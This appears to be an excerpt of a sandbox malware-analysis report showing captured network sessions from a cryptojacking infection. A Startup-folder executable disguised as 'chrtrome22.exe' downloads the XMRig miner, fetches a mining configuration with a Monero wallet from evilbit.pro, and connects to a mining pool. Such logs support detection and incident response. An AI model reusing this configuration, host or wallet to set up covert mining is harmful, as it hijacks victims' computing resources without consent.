2025-01-08 10:42:28 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 34 61 64 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 33 35 65 36 31 34 34 63 38 37 65 63 35 38 39 62 39 34 34 32 64 31 66 38 30 35 37 38 37 61 62 64 38 38 36 34 61 37 37 38 35 64 39 66 35 39 39 36 37 31 66 33 37 66 62 65 30 32 39 33 35 65 64 36 33 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 36 79 2b 55 49 7a 69 78 43 69 44 45 66 54 54 78 54 66 74 35 6d 2f 46 50 2b 67 55 4b 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101094adf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e0000000035e6144c87ec589b9442d1f805787abd8864a7785d9f599671f37fbe02935ed63f","job_id":"6y+UIzixCiDEfTTxTft5m/FP+gUK","target":"8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49737	185.199.109.133	443	5232	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:41:10 UTC	658	OUT	GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2025-01-08 10:41:10 UTC	862	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2666251 Content-Type: application/octet-stream Last-Modified: Sun, 03 Nov 2024 07:56:35 GMT ETag: "0x8DCFBDD0A034A6E" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 4b93fb7f-701e-006d-20c0-4d551e000000 x-ms-version: 2024-11-04 x-ms-creation-time: Sun, 03 Nov 2024 07:56:35 GMT x-ms-blob-content-md5: V7erW859Xkf9Fo4fDUN9Mg== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=xmrig-6.22.2-msvc-win64.zip x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Date: Wed, 08 Jan 2025 10:41:10 GMT Age: 837 X-Served-By: cache-iad-kcgs7200085-IAD, cache-ewr-kewr1740027-EWR X-Cache: HIT, HIT X-Cache-Hits: 7492, 1 X-Timer: S1736332871.920736,VS0,VE1
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 50 4b 03 04 14 00 00 00 00 00 31 75 63 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 50 4b 03 04 0a 00 00 00 00 00 1b 75 63 59 3d 16 f1 ff 3d 00 00 00 3d 00 00 00 1e 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 30 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 65 20 2d 2d 62 65 6e 63 68 3d 31 30 4d 20 2d 2d 73 75 62 6d 69 74 0a 70 61 75 73 65 0a 50 4b 03 04 0a 00 00 00 00 00 1b 75 63 59 d3 c2 d1 ca 3c 00 00 00 3c 00 00 00 1d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 Data Ascii: PK1ucYxmrig-6.22.2/PKucY===xmrig-6.22.2/benchmark_10M.cmd@echo offcd /d "%~dp0"xmrig.exe --bench=10M --submitpausePKucY<<xmrig-6.22.2/benchmark_1M.cmd@echo offcd /d "%~dp0"xmrig.ex
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 2c bc 65 82 94 30 37 e4 6f 02 0f a4 b1 a9 05 8b f3 5a 59 04 b1 63 69 69 5f 2c 87 ce 3f 84 0d 5f 26 0c 3c 23 4c 6b de de 5f ed 27 61 f0 4d 9c a1 b8 99 1d a0 3b 88 2a b4 58 83 41 94 41 09 9b ba 50 92 59 5f 48 84 0b ae e5 6a 52 5b ce 21 b3 73 36 69 27 7e ab 5c 70 bc 3d 76 ed 21 8c 19 cd 31 28 bc af 5c da eb 35 81 b8 ef 85 77 09 8f 05 85 ee e9 58 d6 62 9d 15 44 6e 6b 01 d5 de b1 98 38 4d aa e0 38 08 2c b0 ac 5a 26 16 ed 59 e1 2c 34 ab 89 ad 92 98 a1 e1 59 97 6a 83 f2 5d 80 7b d0 c1 f4 6d f7 a2 74 c4 60 1e 0d 14 62 81 e0 da 68 8e e8 7a 95 58 33 1f 94 4a 2b d6 d6 ed 66 12 7a 12 f6 de ff 91 d5 87 bd ee 9b 0b c3 3f b1 7f ac d3 70 6e c2 2d 39 3a 41 99 ff a8 bf 0e fb e3 93 a3 d1 66 73 27 be e4 83 1a e9 e2 76 dc 1f df 3f cd fb 43 f4 8f 9b d1 d5 e6 c6 1f 7f 7a 1a 1c Data Ascii: ,e07oZYcii_,?_&<#Lk_'aM;*XAAPY_HjR[!s6i'~\p=v!1(\5wXbDnk8M8,Z&Y,4Yj]{mt`bhzX3J+fz?pn-9:Afs'v?Cz
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 66 a2 b1 45 51 48 69 a2 b4 d8 eb 2e 5b b5 60 2f 55 9c 43 d4 a6 8d 82 0e 21 48 44 9b fb 36 6e 6f 9f c9 63 ad 42 33 d7 88 ed 49 0a 0c 61 64 73 2f 5c f6 dc a5 dd 31 f7 65 ad 60 d1 c1 44 a3 c3 9a db 56 26 d7 84 c3 f1 fd 7c db 29 e5 7b 3e fc 05 50 4b 03 04 14 00 00 00 08 00 1b 75 63 59 ce 31 a4 ec fc 01 00 00 35 03 00 00 22 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 73 6f 6c 6f 5f 6d 69 6e 65 5f 65 78 61 6d 70 6c 65 2e 63 6d 64 6d 52 c1 72 da 30 10 3d 87 af d8 66 a6 d3 4b 70 a0 43 5a f0 64 72 08 50 4a 02 0d 43 6b 12 b8 64 84 b5 c6 0a b2 e4 58 72 01 1f fa ed 5d c9 21 49 67 3a a3 c3 6a f5 f6 e9 bd 27 85 21 0c f7 2c cb 25 c2 9a d9 38 85 44 50 99 e8 02 32 a1 84 da c0 54 2b 2c 34 18 2d 75 23 0c 69 c1 37 5d 64 cc ba f2 64 9f 15 62 13 e0 1e a1 a9 e1 52 69 8e c0 Data Ascii: fEQHi.[`/UC!HD6nocB3Iads/\1e`DV&\|){>PKucY15"xmrig-6.22.2/solo_mine_example.cmdmRr0=fKpCZdrPJCkdXr]!Ig:j'!,%8DP2T+,4-u#i7]ddbRi
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 30 37 98 98 b1 c9 80 c8 7a 43 64 65 d7 20 83 25 2d 80 e2 8d a0 7a 34 70 26 b1 e4 1e 00 e2 8d d0 62 c9 f5 1c 44 54 2c e5 2e 40 58 66 b2 84 da 9b be a6 f9 04 e3 26 b1 ad 72 60 72 84 fa ab 08 59 77 0d 3c 19 b6 cb 20 9c 69 be 58 f2 63 a0 6e 19 86 83 9e 47 d0 64 0e ba 0b 41 d3 00 ca a0 2f 4b 47 80 e3 b2 4c 04 98 2d 6b 45 3a 8b 12 8c 5b 18 02 04 e3 66 b1 94 08 30 14 a0 88 2c 07 59 0b 96 99 38 4b 42 2c b9 10 74 46 da 92 b3 01 82 8c 9e b2 0a 8c fe 92 89 1a 62 01 c6 bb 21 63 d0 65 4a 7e 25 96 e5 22 6e c7 6a 22 32 63 55 70 83 5f 00 7f e8 2d ea d7 8d a5 48 e3 ad 3f d1 e8 89 34 d6 72 1b 59 bc 6f 41 32 62 a2 88 6d fc 48 80 0d 5d e5 f0 ad 64 db 20 5e 08 8d 1a 1e 0c 7a 19 c4 44 0d f3 bc 48 43 59 30 f9 87 ca 50 c8 fc fd 90 49 fb 22 a8 05 07 7d 82 cc ff 52 01 b2 5a 7d c8 Data Ascii: 07zCde %-z4p&bDT,.@Xf&r`rYw< iXcnGdA/KGL-kE:[f0,Y8KB,tFb!ceJ~%"nj"2cUp_-H?4rYoA2bmH]d ^zDHCY0PI"}RZ}
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: cd 69 24 3f 06 c9 35 3a dc 9f 1a 46 0e b0 23 53 42 21 a8 e4 1b df 82 b4 9e 1c 40 82 a0 73 80 63 41 02 9d 67 48 4a f3 ba 30 c2 6c 28 64 c6 2a 0a 39 00 7c 03 73 65 20 2f 31 08 6a e0 ca 7f d7 10 c3 63 1f be 8a 12 ee 17 61 43 75 8d f0 43 38 5e 80 63 3f 8d de 86 b6 25 99 45 05 9b 87 90 02 42 2d 37 42 10 85 41 a5 87 d2 28 61 9a a4 8d a0 55 0b 22 fa 85 b9 92 18 66 51 74 0b f0 e9 c5 2c da 31 28 88 4e 62 40 d2 08 df fa 67 3e 91 60 a7 09 de a1 d0 38 9f 8f 8f b9 0f 3d 82 14 40 0e 22 07 f8 84 f8 51 02 c3 48 34 e8 ff e5 7f a8 a0 38 9f e6 64 41 38 cd e4 4f 7d e6 fb 99 2f 80 01 a9 02 60 be e0 5b 9c 37 cf 4c 7d 08 4f 17 3c dd 21 57 c8 07 3c 2d 21 17 80 d9 40 8e 90 03 a0 6d c0 d3 0a e0 48 39 8b 79 3d 89 e8 43 83 ca 0b e8 af 70 05 57 0f 06 fc a1 67 e8 6e 00 0c 14 d0 c7 80 Data Ascii: i$?5:F#SB!@scAgHJ0l(d*9\|se /1jcaCuC8^c?%EB-7BA(aU"fQt,1(Nb@g>`8=@"QH48dA8O}/`[7L}O<!W<-!@mH9y=CpWgn
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: e3 f3 a7 00 d6 c7 98 eb 9e db 1e ce 0d 33 ae d3 d7 1b 09 75 eb 5e 60 a5 79 53 a4 25 f0 84 9d a3 7a fb 38 79 91 3a 3b 67 35 2c 18 2b 62 e8 a3 8a a2 3d 99 c5 56 35 8e 1d 4c 5b f7 b1 69 d2 b7 95 18 ec 17 ff f4 b2 c0 69 5b 97 32 89 50 d4 9b 45 16 a1 89 9b 18 e9 25 82 af 7c b6 1f f8 40 5b a7 d0 e9 19 9d dc 4c a9 d6 f0 f3 dc ff 86 f6 61 ac a2 7f 79 b8 6e 90 f7 49 a7 d0 1d 57 3c 97 3c 5a 30 7b cb a9 6c 93 f7 0d 36 fb f1 4b c2 cc d9 9e 6a b3 1c 8a 8c ec db 0f e9 8a 1c 0b b4 69 d6 5e b8 fa c4 78 42 90 99 c9 67 10 c0 03 20 80 bb b8 01 3c 95 b1 c6 e3 8e 69 2a ce 0c e0 d5 7f 71 00 83 4d 9d 0a 60 7e 17 2a 95 81 84 ee 1c 58 6e 2a d0 66 4d 13 46 1a bf 06 ad 0e 5e 1b bf 14 af 03 83 02 82 16 af 0b e3 b5 f5 f1 78 0e 09 47 22 b1 38 d5 5d 69 46 77 0e e2 e4 47 63 50 48 34 3a Data Ascii: 3u^`yS%z8y:;g5,+b=V5L[ii[2PE%\|@[LaynIW<<Z0{l6Kji^xBg <iqM`~Xn*fMF^xG"8]iFwGcPH4:
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 9f d4 1f c5 b6 ec 70 9a 73 37 39 bc b1 4e d1 65 37 29 5f 72 fd d9 d3 3d c1 ea 5a 4a 31 c7 16 3b 17 4c a4 38 aa 99 10 0f 25 2c 28 9a 7c 15 b7 31 af d9 b2 6b 9f 92 cb 96 de 1c d6 c4 a3 6b b8 96 93 5b 9c 0b b5 82 8c 4b 97 74 2d d9 9e 6e bf 59 d6 50 79 e1 e7 7b 65 e1 a4 84 6b fd bd b2 b6 03 95 63 8c de e4 67 2e 1a c7 8d 43 26 8c 57 d6 a0 dc 92 b3 b4 eb 73 ae 6f 0f 80 8b f6 77 ce cf 9d 2c d5 ac f9 1d 8b 71 ef 81 f2 41 a9 e6 cf e7 5d 4f 8a c3 89 18 31 10 fb 63 3f c4 be 78 f6 70 62 ce 8c d5 fa 77 bc 6d a7 4e ed da e0 8c 6e f8 43 56 e0 92 30 15 2f 09 4b 4c 69 12 fc ae 09 bf 08 56 9f b2 73 de 34 f5 6e e4 70 12 ce 95 e1 17 1e 81 84 33 21 8a 11 02 4e f6 8c 68 44 78 fa 71 7e 2e 03 c8 d1 a7 c4 82 a8 a6 d3 5c 2d 80 1a fe 9b 29 a0 e3 ca 1c ba 42 31 fb 61 4b 99 75 62 13 Data Ascii: ps79Ne7)_r=ZJ1;L8%,(\|1kk[Kt-nYPy{ekcg.C&Wsow,qA]O1c?xpbwmNnCV0/KLiVs4np3!NhDxq~.\-)B1aKub
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 10 25 3d 3a d1 77 b1 5d 29 2d c3 70 fd ab d9 89 ad 92 19 bb 3a 03 08 03 9b de 9f a9 0a 93 6e 31 90 3c bd 43 c8 9f 2f ed fe 23 8b 38 f1 a3 4e 2a 2c df 7b bc 63 5e 47 a4 2a 62 dc 69 42 b9 cf cf 7f e1 8d c8 24 ed e7 9d 7b f8 3e ff 49 db d5 0f 2e 1a 06 1b 5f 60 c0 89 bc 71 20 47 04 4f e5 08 41 3f a1 b8 50 08 29 72 33 53 44 dc b4 f0 5b e5 fa f5 7d 8d 95 14 5c ed c7 09 61 06 95 f2 f5 ae c0 0f ee 0a a4 c0 70 2a 25 10 af 08 cf 9d 8a 52 69 7b 72 00 8d 4a a7 06 81 5b 02 95 16 41 a5 f9 31 c8 a0 87 3a bc 60 2a 24 71 d3 db 03 49 38 77 12 0d f9 09 0c 91 9a 3a 9a 70 f2 c3 52 58 4f 5b 07 af 0f c3 7a 78 24 3f 70 49 3c 42 fe f3 ae 34 bf 95 13 ee 88 3e cb cb e8 3c f4 c4 71 db 96 cf a3 ac 24 d5 d0 e7 44 a5 51 8d f2 da 1c 09 cc d9 91 80 ee c7 c1 41 5d 73 ef 77 cd 21 2e 7a 95 Data Ascii: %=:w])-p:n1<C/#8N,{c^GbiB${>I._`q GOA?P)r3SD[}\ap%Ri{rJ[A1:`$qI8w:pRXO[zx$?pI<B4><q$DQA]sw!.z
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 72 59 fe 32 4f c1 1b 75 2b 9d 67 63 1c ba 46 7c 2b d7 9a d4 77 46 df 90 73 8f 7d 97 16 d5 bd dd d7 3d bb 9d af 53 74 b2 e2 42 dd b6 32 5a 6f 92 88 e8 d6 15 1b 29 dd 52 c7 4d 4b 12 42 ca fb af 9f 33 19 22 c7 bf 70 09 ec fe 90 74 c3 ca 5d d8 f3 88 d9 ab 0f 77 d4 f4 9c cd 1c 0f 7f 5a 51 32 a6 57 bd a8 b4 79 27 39 6c bd 62 f7 97 09 ac d3 22 61 47 a9 e7 89 91 d5 75 b6 93 68 6b fd 72 fc 85 d8 da 87 ed 78 23 73 4b 95 83 89 e8 1e 70 55 ef fe be 7a 7c f8 44 74 33 60 9d 43 7c 20 21 fe df 70 45 ff e1 8b c1 74 97 48 44 c9 c0 b2 d3 5d 40 e8 1b c1 8f 82 e7 7e 6f e1 c5 8b 71 7e 8c d3 d7 06 9f f9 75 60 1d 03 cf 9f fc a3 9e fa 49 ed d1 b0 45 76 c3 aa 48 72 db 4d a1 83 6d ce 31 4b e1 84 2a 3e a1 af 52 e2 68 61 3c b8 71 26 1c 82 13 0a e0 84 7d 18 a9 74 87 f2 88 ed 94 36 b7 Data Ascii: rY2Ou+gcF\|+wFs}=StB2Zo)RMKB3"pt]wZQ2Wy'9lb"aGuhkrx#sKpUz\|Dt3`C\| !pEtHD]@~oq~u`IEvHrMm1K*>Rha<q&}t6
2025-01-08 10:41:10 UTC	1378	IN	Data Raw: 2a 19 18 19 25 10 d5 6f 4f 97 a4 ab 09 39 22 90 0c bf 3d 33 d7 c0 48 fd 04 46 b2 fd f6 9c 6c 41 23 0b 9a 15 fe a2 02 d2 79 4c 37 02 07 31 58 54 0c c0 5f 54 82 df 3c 81 3f 22 f0 2d 8c 6f 65 fa ae 84 5f 2f f0 6d 8c 6f 27 bc 5b cf 5c e0 1b 26 30 5e ca b8 0f bf cb bb f6 20 fc 17 02 af 62 bc 1a bf 73 4d dd 08 8f 11 7c 6a 18 af c3 ef 7d 82 cf 1f 05 7d 80 f1 46 fc 2e 15 78 9a c0 9b 18 97 50 f3 2b 05 de 4d e0 f1 06 c2 4d 3c 84 74 9f 0b fc d4 1d 8c 27 30 6e 66 bc 07 e1 8f 0b fa 24 c6 53 18 ef 46 f8 20 81 a7 32 2e c6 4c 79 11 f0 ef 09 3e 2a e3 e9 8c f7 5c 0c fc b4 c0 33 80 ec 48 01 18 d8 f1 bd d1 68 9e 8d aa 07 b0 35 1e 5f 53 96 df 9a 60 30 a8 9e b8 17 6b 36 4a aa 77 66 62 8e e3 e5 a9 e2 13 e7 f4 0e df 0a d4 3e 34 28 f7 b7 49 92 53 7b dd a9 55 aa de 29 89 19 01 df Data Ascii: %oO9"=3HFlA#yL71XT_T<?"-oe_/mo'[\&0^ bsM\|j}}F.xP+MM<t'0nf$SF 2.Ly>\3Hh5_S`0k6Jwfb>4(IS{U)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	104.21.95.99	443	5232	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:41:13 UTC	166	OUT	GET /config.json HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682 Host: evilbit.pro Connection: Keep-Alive
2025-01-08 10:41:13 UTC	871	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:41:13 GMT Content-Type: application/json Content-Length: 584 Connection: close Last-Modified: Sat, 04 Jan 2025 09:38:19 GMT ETag: "248-62ade27cedc25" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmQzNHwJXcFXm9DybYPB%2BC1Rtn9Qr8XQWFa%2F7cY0xxttyMfTDf2d7f8kv8XsHyJKBFTv9s4mf6zPRBs%2FJp9RZjgv%2B2xfCzP%2BYszYePo0A%2B7TKBMn9yaXHVxO3lDXLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb92ec98d27271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1957&rtt_var=734&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=780&delivery_rate=1490556&cwnd=225&unsent_bytes=0&cid=b11857162ba94c6c&ts=305&x=0"
2025-01-08 10:41:13 UTC	498	IN	Data Raw: 7b 0a 20 20 20 20 22 61 75 74 6f 73 61 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 63 70 75 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 6f 70 65 6e 63 6c 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 22 63 75 64 61 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 22 70 6f 6f 6c 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 75 72 6c 22 3a 20 22 70 6f 6f 6c 2e 73 75 70 70 6f 72 74 78 6d 72 2e 63 6f 6d 3a 34 34 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 75 73 65 72 22 3a 20 22 34 35 4c 75 34 5a 7a 63 70 36 34 65 74 64 6f 56 6e 63 39 6a 53 55 38 34 57 42 79 67 43 37 70 35 6d 64 72 6f 77 5a 69 63 36 4c 56 44 5a 45 52 73 44 73 7a 46 67 63 52 63 46 36 33 47 6d 36 6b 56 63 37 58 73 76 67 70 76 68 48 33 36 53 4e 66 43 6d 55 Data Ascii: { "autosave": true, "cpu": true, "opencl": false, "cuda": false, "pools": [ { "url": "pool.supportxmr.com:443", "user": "45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmU
2025-01-08 10:41:13 UTC	86	IN	Data Raw: 54 77 62 53 47 37 50 56 54 61 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6c 73 22 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 5d 0a 7d 0a Data Ascii: TwbSG7PVTa", "keepalive": true, "tls": true } ]}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	141.94.96.144	443	7340	C:\xmrig\xmrig-6.22.2\xmrig.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:41:22 UTC	561	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 35 4c 75 34 5a 7a 63 70 36 34 65 74 64 6f 56 6e 63 39 6a 53 55 38 34 57 42 79 67 43 37 70 35 6d 64 72 6f 77 5a 69 63 36 4c 56 44 5a 45 52 73 44 73 7a 46 67 63 52 63 46 36 33 47 6d 36 6b 56 63 37 58 73 76 67 70 76 68 48 33 36 53 4e 66 43 6d 55 41 62 31 54 77 62 53 47 37 50 56 54 61 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 32 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 39 2e 32 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmUAb1TwbSG7PVTa","pass":"x","agent":"XMRig/6.22.2 (Windows NT 10.0; Win64; x64) libuv/1.49.2 msvc/2019","algo":["cn
2025-01-08 10:41:22 UTC	539	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 66 38 36 32 61 35 35 64 2d 62 35 36 31 2d 34 34 36 37 2d 38 33 39 61 2d 64 66 63 38 39 33 64 34 31 65 34 62 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 64 61 63 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 64 66 30 66 63 38 31 39 65 30 62 65 37 39 33 31 66 66 66 38 34 36 65 65 31 61 37 34 37 39 34 36 62 33 36 39 37 36 61 33 63 61 65 66 65 62 65 65 64 65 35 32 39 34 35 36 33 39 61 65 33 35 35 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"f862a55d-b561-4467-839a-dfc893d41e4b","job":{"blob":"1010cdacf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e00000000df0fc819e0be7931fff846ee1a747946b36976a3caefebeede52945639ae355
2025-01-08 10:41:27 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 37 61 63 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 31 34 63 33 32 66 35 33 66 39 37 36 32 36 33 61 65 30 63 62 33 66 31 38 64 61 37 34 31 38 30 33 34 39 61 31 62 38 31 31 61 36 37 65 66 63 34 35 63 64 63 62 61 35 65 31 36 66 36 31 34 63 65 34 31 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 30 6f 50 2b 4c 45 4b 65 67 48 4c 43 4b 70 32 6a 4a 31 36 6d 51 42 39 58 50 7a 69 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d7acf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e0000000014c32f53f976263ae0cb3f18da74180349a1b811a67efc45cdcba5e16f614ce415","job_id":"20oP+LEKegHLCKp2jJ16mQB9XPzi","target":"8
2025-01-08 10:41:38 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 31 61 63 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 34 66 32 30 30 61 36 30 33 30 64 34 30 39 37 31 61 61 62 31 62 37 36 61 66 30 63 36 32 34 34 65 65 38 32 61 66 37 35 32 34 65 34 33 61 34 34 65 64 62 30 63 33 32 37 36 64 63 32 32 35 31 62 31 31 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 4c 45 4b 38 55 53 38 31 78 66 4b 48 32 76 4f 69 7a 6b 50 50 33 77 63 72 56 6f 38 42 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e1acf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e000000004f200a6030d40971aab1b76af0c6244ee82af7524e43a44edb0c3276dc2251b11a","job_id":"LEK8US81xfKH2vOizkPP3wcrVo8B","target":"8
2025-01-08 10:41:48 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 62 61 63 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 32 31 30 33 31 37 36 65 32 34 65 65 36 64 61 39 37 30 30 63 65 65 37 30 64 31 34 35 66 65 34 62 30 31 33 32 38 30 31 39 37 64 33 32 31 63 63 33 38 38 35 34 34 32 34 65 36 30 35 37 66 32 36 36 32 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 36 58 6f 68 65 54 71 36 63 46 42 31 66 51 5a 32 69 6a 54 69 41 78 38 73 65 58 32 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010ebacf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e000000002103176e24ee6da9700cee70d145fe4b013280197d321cc38854424e6057f26622","job_id":"86XoheTq6cFB1fQZ2ijTiAx8seX2","target":"8
